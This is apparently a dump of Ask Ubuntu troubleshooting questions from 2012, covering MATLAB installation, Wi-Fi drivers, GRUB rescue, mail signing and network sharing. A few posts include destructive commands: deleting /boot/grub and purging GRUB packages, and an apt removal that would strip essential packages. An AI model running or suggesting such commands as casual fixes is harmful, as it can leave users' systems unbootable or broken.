195733	trouble installing matlab due to java.lang.noclassdeffounderror	so whenever i try to install matlab , the first image appears , but then goes away and that 's the end of it . here 's what i 'm doing- user @ host $ > cd ~/mathworks_downloads user @ host $ > unzip matlab_r2012a_student_glnx86_installer.zip user @ host $ > ./install the matlab logo and image pop up here for a few seconds before going away . this is the output i receive- could not find jre for glnxa64 . trying glnx86 . preparing installation files ... installing ... exception in thread `` main '' java.lang.noclassdeffounderror : could not initialize class java.awt.component at java.lang.class.forname0 ( native method ) at java.lang.class.forname ( unknown source ) at $ proxy11. < clinit > ( unknown source ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( unknown source ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( unknown source ) at java.lang.reflect.constructor.newinstance ( unknown source ) at java.lang.reflect.proxy.newproxyinstance ( unknown source ) at com.google.inject.internal.constructioncontext.createproxy ( constructioncontext.java:81 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:70 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.internal.providermethod.get ( providermethod.java:95 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.spi.providerlookup $ 1.get ( providerlookup.java:89 ) at com.google.inject.internal.providermethod.get ( providermethod.java:95 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.singleparameterinjector.inject ( singleparameterinjector.java:42 ) at com.google.inject.singleparameterinjector.getall ( singleparameterinjector.java:66 ) at com.google.inject.constructorinjector.construct ( constructorinjector.java:84 ) at com.google.inject.constructorbindingimpl $ factory.get ( constructorbindingimpl.java:111 ) at com.google.inject.factoryproxy.get ( factoryproxy.java:56 ) at com.google.inject.providertointernalfactoryadapter $ 1.call ( providertointernalfactoryadapter.java:45 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:811 ) at com.google.inject.providertointernalfactoryadapter.get ( providertointernalfactoryadapter.java:42 ) at com.google.inject.scopes $ 1 $ 1.get ( scopes.java:54 ) at com.google.inject.internalfactorytoprovideradapter.get ( internalfactorytoprovideradapter.java:48 ) at com.google.inject.injectorimpl $ 4 $ 1.call ( injectorimpl.java:758 ) at com.google.inject.injectorimpl.callincontext ( injectorimpl.java:804 ) at com.google.inject.injectorimpl $ 4.get ( injectorimpl.java:754 ) at com.google.inject.injectorimpl.getinstance ( injectorimpl.java:793 ) at com.mathworks.wizard.wizardlauncher.startwizard ( wizardlauncher.java:160 ) at com.mathworks.wizard.wizardlauncher.start ( wizardlauncher.java:75 ) at com.mathworks.wizard.abstractlauncher.launch ( abstractlauncher.java:27 ) at com.mathworks.wizard.abstractlauncher.launchstandalone ( abstractlauncher.java:18 ) at com.mathworks.studentinstaller.launcher.main ( launcher.java:23 ) finished after that , nothing happens , although apparently a matlab window is supposed to open . is this a problem caused by the fact that i 'm running openjkd 7 instead of jre 7u7 ?
195739	how to run matlab installed on windows from linux	i have windows and ubuntu installed on my computer . i have matlab r2012a installed on windows and i will like to launch matlab from ubuntu . i can navigate to the matlab folder from windows but i do not know how to launch it . i appreciate any suggestions .
195746	wpa2 authentication fails using usb network devices ( linksys and rosewill )	decided to reduce the clutter in the house and replace a wired connection with a wireless one on my wife 's system using usb network device rosewill rnx-x1 . i can see and connect to unprotected network , but wpa2 authentication repeatedly fails . tried the same with a linksys usb network adapter . both failed to authenticate . worth noting that i recently switched from comcast to centurylink and so switched routers . the system connected successfully to previous router ( linksys ea4500 ) using wpa2 . would think it is the router ( actiontec c1000a ) but all other devices ( tv , ipad , windows , blackberry , and squeezebox ) connect ok. would appreciate some diagnostic guidance and insight . the following is the result of the analysis script suggested in the thread http : //ubuntuforums.org/showpost.php ? p=10564143 & postcount=7 pci wireless devices usb wireless devices bus 001 device 010 : id 148f:2870 ralink technology , corp. rt2870 wireless adapter list of network devices *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 01 serial : 00 : e0:4d:30:40 : a1 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:47 ioport : ac00 ( size=256 ) memory : fdcff000-fdcfffff memory : fdb00000-fdb1ffff *-network description : wireless interface physical id : 1 bus info : usb @ 1:2 logical name : wlan1 serial : 00:02:6f : bd:30 : a0 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt2800usb driverversion=3.2.0-31-generic firmware=0.29 link=yes multicast=yes wireless=ieee 802.11bgn list of drivers module size used by rndis_wlan 28472 0 rndis_host 13560 1 rndis_wlan cdc_ether 13312 1 rndis_host usbnet 25214 3 rndis_wlan , rndis_host , cdc_ether bnep 17830 2 parport_pc 32114 0 rfcomm 38139 0 bluetooth 158438 10 bnep , rfcomm ppdev 12849 0 vesafb 13516 1 binfmt_misc 17292 1 snd_hda_codec_hdmi 31775 1 snd_hda_codec_realtek 174313 1 nvidia 10962290 30 snd_usb_audio 101566 1 snd_usbmidi_lib 24603 1 snd_usb_audio arc4 12473 2 snd_hda_intel 32765 3 snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_seq_midi 13132 0 snd_rawmidi 25424 2 snd_usbmidi_lib , snd_seq_midi uvcvideo 67203 0 videodev 86588 1 uvcvideo snd_hwdep 13276 2 snd_usb_audio , snd_hda_codec snd_seq_midi_event 14475 1 snd_seq_midi rt2800usb 22300 0 rt2800lib 53264 1 rt2800usb crc_ccitt 12595 1 rt2800lib rt2x00usb 20061 1 rt2800usb rt2x00lib 48805 3 rt2800usb , rt2800lib , rt2x00usb mac80211 436455 3 rt2800lib , rt2x00usb , rt2x00lib cfg80211 178679 3 rndis_wlan , rt2x00lib , mac80211 snd_pcm 80845 4 snd_hda_codec_hdmi , snd_usb_audio , snd_hda_intel , snd_hda_codec snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event psmouse 96619 0 serio_raw 13027 0 i2c_nforce2 12906 0 k8temp 12905 0 snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq snd_page_alloc 14115 2 snd_hda_intel , snd_pcm snd 62064 20 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_usb_audio , snd_usbmidi_lib , snd_hda_intel , snd_hda_codec , snd_rawmidi , snd_hwdep , snd_pcm , snd_seq , snd_timer , snd_seq_device soundcore 14635 1 snd wmi 18744 0 mac_hid 13077 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp usbhid 41906 0 hid 77367 1 usbhid r8169 56321 0 pata_amd 13750 0 network info eth0 link encap : ethernet hwaddr 00 : e0:4d:30:40 : a1 inet6 addr : fe80 : :2e0:4dff : fe30:40a1/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:174441 errors:0 dropped:0 overruns:0 frame:0 tx packets:125781 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:147560093 ( 147.5 mb ) tx bytes:20180051 ( 20.1 mb ) interrupt:47 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:14810 errors:0 dropped:0 overruns:0 frame:0 tx packets:14810 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1474361 ( 1.4 mb ) tx bytes:1474361 ( 1.4 mb ) wlan1 link encap : ethernet hwaddr 00:02:6f : bd:30 : a0 inet6 addr : fe80 : :202:6fff : febd:30a0/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:148 errors:0 dropped:0 overruns:0 frame:0 tx packets:148 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:19980 ( 19.9 kb ) tx bytes:22940 ( 22.9 kb ) wireless specific network info lo no wireless extensions . eth0 no wireless extensions . wlan1 ieee 802.11bgn essid : '' youtz family '' mode : managed frequency:2.412 ghz access point : 20:76:00:86:7d:84 bit rate:6.5 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=56/70 signal level=-54 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:6 invalid misc:2 missed beacon:0 wed oct 3 17:51:32 cdt 2012 would appreciate insight on how to chase this down .
195749	do i have the rights for a youtube downloader in usc ?	i have made a media converter called format-junkie , participated at the ubuntu app showdown . i am wondering if i add to the program the ability to download a youtube video and maybe convert it at mp3 , will the program be able to be in usc at ubuntu 13.04 ? or i do n't have rights for something like this ? i am wondering cause i think , minitube has the ability to download to youtube videos..
195750	install ubuntu on imac 21.5 '' ( mid 2011 )	i has a dual boot system with macosx 10.8.2 and microsoft windows 7 home premium x64 . i would like to install ubuntu alongside the two existing operating systems for cross platform development purposes . my system specs are listed below . imac 21.5-inch ( mid 2011 ) intel core i7 @ 2.80ghz amd radeon hd 6770m facetime hd internet camera thunderbolt port wireless airport adapter card apple 8x superdrive apple magic mouse and wired keyboard with numeric keypad will refit install properly on my machine too ? thanks you very much for the help .
195755	what do ffe and uife mean ?	various bugs on launchpad have `` [ ffe ] '' and/or `` [ uife ] '' in the title . what do these acronyms stand for ?
195757	mounting hfs+ drive over network , write not required	i really need to figure out how to configure out how to get my linux box to mount a drive from my mac . they are permanently networked . my mac is called fuzzy , and has been set up to allow the movies folder out via smb . i ran smbtree and this drive shows up as \\fuzzy\movies . things i have tried : sudo mount -t smbfs \\fuzzy\movies -o username=** , password=** /media/movies error : mount : unknown filesystem type 'smbfs' sudo mount -t cifs \\fuzzy\movies -o username=** , password=** /media/movies error : mount : wrong fs type , bad option , bad superblock on \fuzzymovies , sudo mount -t hfsplus -o force \\fuzzy\movies /media/movies mount : special device \fuzzymovies does not exist
195758	how do i open port 51413 for transmission ?	just moved to ubuntu on my macbook and spend whole day trying to open transmission port 51413 . already done : i have ufw but i opened ports there and tried without it - probably not the problem 51413/tcp allow anywhere 51413/tcp allow anywhere ( v6 ) 21/tcp allow out anywhere 80 allow out anywhere 143 allow out anywhere 2049 allow out anywhere 110 allow out anywhere 135,139,445/tcp allow out anywhere 137,138/udp allow out anywhere 25/tcp allow out anywhere 631 allow out anywhere 443/tcp allow out anywhere 53/udp allow out anywhere 123/udp allow out anywhere 993/tcp allow out anywhere 465/tcp allow out anywhere 51413/tcp allow out anywhere router pirelli drg a125g ; tried disabling firewall , forwarding ports according portforward.com but i have no experience with such thing so i dont know if i succeeded on transmission still shows port blocked and nothing is downloading ... canyouseeme.org tried tu use to see if ports are open but it shows that port is blocked also tried qbitorrent it also doesnt work
195764	gtk-warning : failed to set text from markup due to error parsing markup ( bit.trip runner )	i am trying to run a game i downloaded from the ubuntu software center called bit.trip runner . upon running it , the game immediately crashes . when running from terminal , i get this output : fatal error string : failed to copy string : dst too small ( 32 < 52 ) ( zenity:2515 ) : gtk-warning ** : failed to set text from markup due to error parsing markup : error on line 1 char 59 : ' ' is not a valid character following a ' < ' character ; it may not begin an element name i should mention that i am running lubuntu 12.04 64bit , i have tried removing and reinstalling via ubuntu software center , and that i have the proprietary drivers for my gpu installed , although the error does n't appear to be related to the graphics at all ...
195768	ubuntu linux problems	i have a problem that i feel you will see for the first time . so , i was trying to install php-apc and it broke some pipe . now , when i start to go by trace to fix everything i need to remove libssl and then put it back . kindof reinstall . here is what it shows me : > root { test } # apt-get remove libssl0.9.8 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libts-0.0-0 libswscale0 libavutil49 libsensors4 lsof libavfilter0 libspeex1 libisccc60 libavcodec52 libdirectfb-1.2-0 liblwres60 libidn11-dev libtheora0 lm-sensors libpostproc51 geoip-database libraw1394-11 libgsm1 fancontrol libvorbisenc2 libschroedinger-1.0-0 libavformat52 libdc1394-22 libgeoip1 libperl5.10 tsconf libsysfs2 liboil0.3 libisc60 libvorbis0a libusb-1.0-0 libogg0 use 'apt-get autoremove ' to remove them . the following packages will be removed : apache2 apache2-mpm-prefork apache2-prefork-dev apache2-utils apache2.2-bin apache2.2-common apport apt-transport-https bind9 bind9-host bind9utils bsd-mailx byobu ca-certificates command-not-found courier-imap courier-imap-ssl courier-pop courier-pop-ssl courier-ssl curl dnsutils dovecot-common dput ffmpeg git-core gnupg-curl landscape-common language-selector-common libaprutil1-dev libasound2 libavdevice52 libbind9-60 libcurl3 libcurl3-gnutls libcurl4-openssl-dev libdns64 libisccfg60 libnet-ssleay-perl libpq-dev libpq5 libpython2.6 libsasl2-dev libsasl2-modules libsdl1.2debian libsdl1.2debian-alsa libsnmp-base libsnmp-dev libsnmp-perl libsnmp15 libssl-dev libssl0.9.8 lsb-release ntpdate openpanel-core openpanel-mod-dnsdomain openpanel-mod-domain openpanel-mod-iptables openpanel-mod-mysql openpanel-mod-postfixcourier openpanel-mod-softwareupdate openpanel-mod-spamassassin openpanel-mod-ssh openpanel-mod-user openpanel-swupd openpanel-validatepem openssh-client openssh-server openssl postfix pure-ftpd python python-apport python-apt python-central python-dbus python-gdbm python-gnupginterface python-gobject python-httplib2 python-launchpadlib python-lazr.restfulclient python-lazr.uri python-minimal python-newt python-oauth python-openpanel python-openssl python-pam python-pexpect python-pkg-resources python-problem-report python-pycurl python-serial python-simplejson python-smartpm python-support python-twisted-bin python-twisted-core python-wadllib python-zope.interface python2.6 python2.6-minimal spamc ssl-cert tcpdump ubuntu-minimal ubuntu-standard ufw unattended-upgrades update-manager-core update-notifier-common vim w3m webmin wget wpasupplicant warning : the following essential packages will be removed . this should not be done unless you know exactly what you are doing ! python-minimal python2.6-minimal ( due to python-minimal ) 0 upgraded , 0 newly installed , 117 to remove and 1 not upgraded . after this operation , 259mb disk space will be freed . you are about to do something potentially harmful . to continue type in the phrase 'yes , do as i say ! ' ? ] any ideas why and what should i do ?
195771	new installation of windows xp on new hard drive does not recognize 2 previously installed sata drives with ubuntu	drives are recognized in hardware manager but are not recognized in mycomputer so can not be accessed from windows . disks are shown with a primary partition and a 7.5g logical drive'
195772	removing tex live	i want to update my tex live 2009 to 2012 . i want a fresh install and would like to remove tex live 2009 on my ubuntu . how should i remove tex live using my terminal ?
195775	what partition type do i choose when i create partitions for ubuntu and windows 7	i 'm trying to install ubuntu on a laptop with no os . afterwards i 'll hopefully be able to install windows 7 on what 's left of the hard drive . i 'm at the step where i create the partitions and not sure what to do . i see device type mount point format size /dev/sda /dev/sda1 ext4 ( check ) 500gb /dev/sda2 ext4 ( check ) 250gb ( both were selected as primary drives ) do i choose anything for 'mount point' and is the type i selected ( ext4 ) going to be ok for installing both operating systems on the same hard drive on two separate partitions ? also , i have to choose between : device for boot loader installation : - /dev/sda 750gb hard drive or , - /dev/sbd thanks everyone for your help !
195778	grub-pc [ rescue mode ] error : unknown filesystem	this is a question relative to the post how to fix `` error : unknown filesystem . grub rescue i 've follow the post of virpara step by step on an asus eeepc 1015pem ( do n't know if it 's usefull to presice this , in fact yes , it 's to say that i ca n't insert a cd in this computer ... ) and i 'm stuck on step 5 ( load the linux kernel and initrd image ) i 've typed , in this order : set prefix= ( hd1 , msdos1 ) /usr/lib/grub/i386-pc insmod linux normal //seen that on an other website loopback loop ( hd2 , msdos1 ) /setup/ubuntu-12.04.1-desktop-i386.iso //the image is on an external hard disk ( does it matter ? ) set root= ( loop ) and had no return message ( no error message ) , then when i typed : linux /casper/vmlinuz boot=casper iso-scan/filename=/ubuntu-12.04.1-desktop-i386.iso noprompt noeject here , i have the famous message : error : unknown filesystem i do n't really know were is my mistake but i suppose it makes impossible for me to reach further steps and achieve grub recuperation . i 'll be grateful if someone could explain were seem to be my problem .
195782	how to view a list of packages that were manually installed without their dependancies	how do i see a list of packages i manually ( really manually , as in i typed them in ) installed ? i want to exclude packages that were installed as a result of being dependencies of other packages that i manually typed in . for example , if i ran the command : sudo apt-get install mysql-server and as a result mysql-common was installed , i want to only see mysql-server in the list and not mysql-common . i 've searched for an answer and found many that were close but not exactly what i want .
195785	ubuntu 12.04 lts wireless asus usb-n53 ( rt3572sta ) driver installation issue	my purchase of the asus usb-n53 just came in today and i spent several hours googling and researching drivers for this device . when i first plugged the device in it connected fine to my open system , wep , dhcp configured access point . i opened google chrome and a few pages loaded , everything seemed fine . 30 seconds later ... boom ! it disconnected and showed attempts to reconnect and asked for the wep key and just showed a state of infinite connection time until it asked me for the password again . i 'm using amd64 ( 64 bit ubuntu desktop 12.04 lts ) the official driver can be found here although i had no luck with it . lsusb : bus 003 device 002 : id 0b05:179d asustek computer , inc. uname -a linux jake 3.2.0-31-generic # 50-ubuntu smp fri sep 7 16:16:45 utc 2012 x86_64 x86_64 x86_64 gnu/linux
195786	flickering line after updating ubuntu 11.10	i just bought a new dell vostro 2520 pre-installed with ubuntu 11.10 . all was fine until i updated the os . since then , i have this flickering line at the top of my screen and it wo n't go after rebooting or changing the screen resolution . it gets really annoying . i do n't know which update did this . i tried reinstalling the image from dell , and it worked fine until i applied the updates . i tried to take a screen shot but it does not show . the line seems to be outside the desktop area . help please ... thanks !
195789	what are some of the basic sudo commands ?	i am looking to learn sudo commands for the gnome terminal . i am an avid user of ubuntu however i 'd like very much to learn as many commands and shortcuts as possible . i am running ubuntu 12.04 32 bit on a compaq presario cq60 .
195793	logging every time a command is run	i want to log every time i run a certain type of command in the terminal . for example , every time i run : sudo apt-get install [ something ] i want to add [ something ] to a log file in my home directory that will look like the following : [ timestamp ] [ something ] 2012-10-02 mysql-server 2012-10-03 ruby1.9.1 2012-10-06 gedit-plugins 2012-10-07 gnome-panel synaptic what 's the easiest way to make this happen automatically ?
195797	would installing debugging symbols help for reporting bugs ?	i 'm running a beta version of ubuntu ( 12.10 ) and i 've been reporting crashes through apport 's automated system . i 've glanced at the stacktraces for a couple of the issues and noticed a lot of what look like hex addresses and these : no symbol table info available . i was wondering if installing the debugging symbols packages from synaptic would provide better information to package maintainers when i report bugs . in other words , would the stacktrace be more useful if i installed those packages ? if so , would installing those packages make any ( noticeable ) performances differences ( will my computer run slower ) ?
195801	when uninstalling all grub packages for ec2 ami build script , how do i bypass prompting ?	when i try to uninstall all grub packages from the cloud-image version of ubuntu i use in aws ec2 , i get an interactive prompt . i need put this all in a script under automation , so prompts need to be avoided . i have searched for means to bypass this , and all of the features like debconf apply to prompts for config settings which can be provided in advance . but the prompt i am getting is not a config prompt . it would be in the class of `` are you sure '' prompts . i tried -- force-all and that did not work . the prompt is referring to the files in /boot/grub so i tried by first doing `` rm -fr /boot/grub '' ( they do all go away ) and it still prompts to ask me if i want to delete them even though there is nothing to delete . the wording of the prompt is : do you want to have all grub 2 files removed from /boot/grub ? this will make the system unbootable unless another boot loader is installed . remove grub 2 from /boot/grub ? < yes > < no > the command i am doing is : dpkg -- purge grub-common grub-gfxpayload-lists grub-legacy-ec2 grub-pc grub-pc-bin grub2-common how can i get past this prompt without trying to encapsulate it in something that tries to answer ( which itself has issues when there is no tty so i want to avoid that ) ?
195806	kernel panic - diagnosis ?	i 'm having a kernel panic problem - my machine will run for hours , maybe all day and then have a panic attack . i have no idea how to interpret the output , but here 's a picture of what 's left on the screen when it happens : i 've looked through the logs but did n't find anything obvious - i 'm still learning though so i 've probably missed something . it 's a little harder since it 's always happened when i 've been out or at night so i ca n't pinpoint the exact time it crashed . anyone have advice ? thanks
195807	display system information	i would like output akin to that of osx 's system_profiler ( https : //developer.apple.com/library/mac/ # documentation/darwin/reference/manpages/man8/system_profiler.8.html ) on ubuntu , i have to string a few utilities togeter : uname -a , lshw , ifconfig , etc ... and then extract the list of installed software packages ... is there a single , simple facade to getting human readable system info from the cli ?
195808	how to share internet over wifi from wvdial in 12.04 ?	i have just installed 12.04 on a separate partition on my hard drive so i can dual-boot to either windows 7 or ubuntu . i am living in japan and so i 'm using a mobile broadband usb device called `` softbank c02lc '' . by default it seems that this device is n't recognized , so i did the following : terminal : sudo su nano /usr/bin/usbmodemscript nano : # ! /bin/bash echo 1c9e 9900 > /sys/bus/usb-serial/drivers/option1/new_id terminal : chmod +x /usr/bin/usbmodemscript nano /etc/udev/rules.d/option.rules nano : attrs { idvendor } == '' 1c9e '' , attrs { idproduct } == '' 9900 '' , run+= '' /usr/bin/usbmodemscript '' attrs { idvendor } == '' 1c9e '' , attrs { idproduct } == '' 9900 '' , run+= '' /sbin/modprobe option '' which made the device visible from the network manager etc . however , even though i set up my details correctly when i created a new connection ( correct username , apn etc ) as soon as i try to connect it almost immediately disconnects . because of this i then followed the instructions at this site . and i ended up using the c02lc_connect script at the bottom of the page to connect to the internet . the file contains the following bash script : # ! /bin/sh usbinterfece=/dev/ttyusb2 vid=1c9e pid=9900 wrong_pid=f000 lsusb=/usr/sbin/lsusb grep=/bin/grep modprobe=/sbin/modprobe switch=/usr/sbin/usb_modeswitch switch_d=/etc/usb_modeswitch.d wvdial=/usr/bin/wvdial sleep=/bin/sleep sudo=/usr/bin/sudo which=/usr/bin/which switch_config= '' $ switch_d/ $ vid : $ wrong_pid '' if ! [ -x $ wvdial -a -x $ switch ] ; then echo `` install wvdial and usb_modeswitch . '' exit 0 fi check_usb ( ) { local vid= '' $ 1 '' local pid= '' $ 2 '' ( $ lsusb | $ grep `` $ vid : $ pid '' ) } if ! ( check_usb `` $ vid '' `` $ pid '' ) ; then echo `` can not find modem device ... '' if ( check_usb `` $ vid '' `` $ wrong_pid '' ) & & ( [ -f `` $ switch_config '' ] ) ; then echo `` the device is attached but its mode is wrong . '' echo `` try usb_modeswitch ... '' $ sudo $ switch -c `` $ switch_config '' $ sleep 1 if ( check_usb `` $ vid '' `` $ pid '' ) ; then echo `` successfully switched the mode . '' else echo `` failed to switch the mode ... '' exit 1 fi else exit 1 fi fi if [ ! -c `` $ usbinterface '' ] ; then $ sudo $ modprobe usbserial vendor=0x $ vid product=0x $ pid $ sleep 2 fi $ sudo $ wvdial which works completely fine - no problems what-so-ever . but we also have 1 more laptop here which i need to share the internet connection with . in windows 7 i do this with the connectify program , and in ubuntu i have seen that you can do things like set up hotspots etc . but because i am using wvdial i am not sure how i would share the internet . i am only beginning to use ubuntu but unfortunately until i can figure out how to share the internet over wifi when connected via wvdial i have to stick with windows . if you have any ideas on how to do this it would be much appreciated .
195812	2 external displays on thinkpad t430s with hd4000 graphics	i am trying to run 2 external displays with my thinkpad t430s but it does n't work . i get the error : could not set the configuration for crtc 65 i 'm using the vga output and the hdmi output with a hdmi to vga adapter to go into two vga screens . i read on intel 's documentation that the hd4000 is supposed to be able to manage 2 external screens on top of the internal display ... would it be possible to achieve with ubuntu 12.04 ?
195813	12.04 postfix opendkim no dkim signature	i followed the instructions in this post here 's my postfix main.cf smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no append_dot_mydomain = no readme_directory = no # tls parameters smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache myhostname = 2mm.biz alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = 2mm.biz , 2mm.compute-1.internal , localhost.compute-1.internal , localhost relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 54.243.206.201/32 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all inet_protocols = all luser_relay = ubuntu @ localhost local_recipient_maps = virtual_alias_domains = 2mm.biz virtual_alias_maps = hash : /etc/postfix/virtual # added below for dkim milter_default_action = accept milter_protocol = 2 smtpd_milters=inet : localhost:8891 non_smtpd_milters=inet : localhost:8891 # eof and here is my opendkim.conf syslog yes logwhy yes umask 022 userid opendkim : opendkim domain 2mm.biz keyfile /etc/opendkim/20121002.private selector 20121002 canonicalization relaxed/simple mode sv # subdomains no keytable refile : /etc/opendkim/keytable signingtable refile : /etc/opendkim/signingtable externalignorelist refile : /etc/opendkim/trustedhosts internalhosts refile : /etc/opendkim/trustedhosts socket inet:8891 @ localhost i 'm only using one domain so i left subdomains commented out . when i check with http : //www.brandonchecketts.com/emailtest.php it says that there are no domainkeys or dkim signature . i updated my dns with my public key . this is on an amazon ec2 64 bit ubuntu micro instance . i used sendmail command to test the signatures . i 'm to sure where else to look for a solution . any ideas ?
195816	installing cassandra with php	i want to install cassandra to be used in php . apache http server is good . i did n't get any valuable tutorial on installing apache , php and cassandra in ubuntu . all the tutorials shown , may be they are for old versions of cassandra or i got some problems in thrift . so guys i request you to please suggest me any good tutorial on how to install & configure php with cassandra . thank you ! i 'm using ubuntu 12.04 lts desktop edition .
195818	how to fix my monitor which is always out of range	i could really use some help . sorry in advance for long post . friend gave me sweet 24 '' lg monitor , which worked when i plugged it in . perfect resolution , etc . then power went out or something happened and shut system down . when i rebooted monitor displayed out of range 92.9/58 . nothing i do can get past this screen . i tried holding shift down at boot , but will not pass this screen . only thing that works is booting from live cd , and clicking , try ubuntu . when i do that , the screen comes alive and is perfect . i even open display settings , and it has a selection that is just right . when i reboot , taking ubuntu cd out , i get that same out of range screen . i even booted with ubuntu cd , then when it opened , i went into terminal and downloaded the most recent nvidia driver , 304.51 . said it installed . i went to nvidia-settings in dash , and a dialog says i need to restart x server . went to terminal typed nvidia-settings config ( something like that , ca n't remember ) , and it said something i ca n't remember , but about xorg file . nothing is working . as soon as i reboot without ubuntu cd , i get out of range . help !
195836	how to access and use another ubuntu over lan ?	i 'd like to have seamless control over my computer from my laptop within my home lan . after seeing this post , it would seem that seamless ( no lagginess at all , which vnc introduces ) control is possible - but i 'm not sure which technologies would work . i 've tried vnc , even with compression on , but there is still a bit of a delay in the frames .
